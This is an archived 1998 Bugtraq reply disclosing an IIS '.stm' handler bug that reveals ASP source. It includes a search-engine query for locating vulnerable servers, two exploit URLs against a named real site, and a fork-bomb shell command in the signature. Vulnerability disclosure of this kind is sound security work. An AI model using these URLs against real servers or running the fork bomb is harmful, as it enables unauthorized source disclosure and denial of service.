[prev in list] [next in list] [prev in thread] [next in thread] 

List:       bugtraq
Subject:    Re: Handler Mapped File Extensions Bug
From:       Michal Zalewski <lcamtuf () BOSS ! STASZIC ! WAW ! PL>
Date:       1998-02-28 10:52:30
[Download RAW message or body]

> I could not reproduce the ability to read raw source.  Perhaps the
> system that it was possible to read the source from did not have the .
> bug fix applied.

Use HotBot search engine to locate vunerable machines:

http://www.search.hotbot.com/hResult.html?MT=Error+processing+SSI+file&SM=phrase&DV=7&RG=.com&DC=100&DE=2&OPs=MDRTP&_v=2&DU=days&SW=web&search.x=37&search.y=14


I tried this:

http://www.beleggingswedstrijd.ie.nl/asp/something.stm/asp/Index.asp
http://www.beleggingswedstrijd.ie.nl/include/something.stm/include/Misc.stm

It works.

_______________________________________________________________________
Michał Zalewski [tel 9690] | finger 4 PGP [lcamtuf@boss.staszic.waw.pl]
Iterować jest rzeczą ludzką, wykonywać rekursywnie - boską [P. Deustch]
=--------------- [ echo "\$0&\$0">_;chmod +x _;./_ ] -----------------=


[prev in list] [next in list] [prev in thread] [next in thread] 

Configure | About | News | Add a list | Sponsored by KoreLogic